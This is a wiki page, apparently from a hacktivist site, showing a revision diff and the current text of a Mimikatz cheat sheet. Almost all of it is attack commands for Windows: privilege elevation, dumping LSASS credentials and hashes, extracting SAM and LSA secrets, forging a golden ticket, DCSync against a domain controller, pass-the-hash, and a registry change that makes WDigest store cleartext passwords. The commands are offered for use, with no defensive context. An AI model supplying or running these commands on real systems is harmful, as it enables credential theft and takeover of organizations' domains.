Mimikatz: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
mNo edit summary
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md Mimikatz cheat sheet]
=== Elevate privileges ===
=== Elevate privileges ===
* privilege::debug
* privilege::debug
* token::elevate
* token::elevate


=== Show recently logged on users ===
=== Show recently logged on user credentials and hashes ===
* sekurlsa::logonpasswords
* sekurlsa::logonpasswords


Latest revision as of 19:08, 24 July 2023

Mimikatz cheat sheet

Elevate privileges

  • privilege::debug
  • token::elevate

Show recently logged on user credentials and hashes

  • sekurlsa::logonpasswords

Dump lsass via task manager

Task Manager > Details > lsass.exe > Right click > Create dump file > lsass.DMP

  • sekurlsa::minidump lsass.DMP
  • sekurlsa::logonpasswords

Dump hashes

  • lsadump::sam
  • lsadump::lsa /patch
  • lsadump::lsa /inject
  • lsadump::cache
  • sekurlsa::ekeys

Secrets

  • lsadump::secrets

Create a golden ticket on the domain controller

  • lsadump::lsa /inject /name:krbtgt
  • kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
  • misc::cmd

Retrieve the password hashes of user accounts from a domain controller

  • lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL>

Pass the hash

  • sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd

Wdigest - extracting passwords in cleartext

  • sekurlsa::wdigest

Enable Wdigest

  • reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Retrieved from "https://enlacehacktivista.org/index.php?title=Mimikatz&oldid=1153"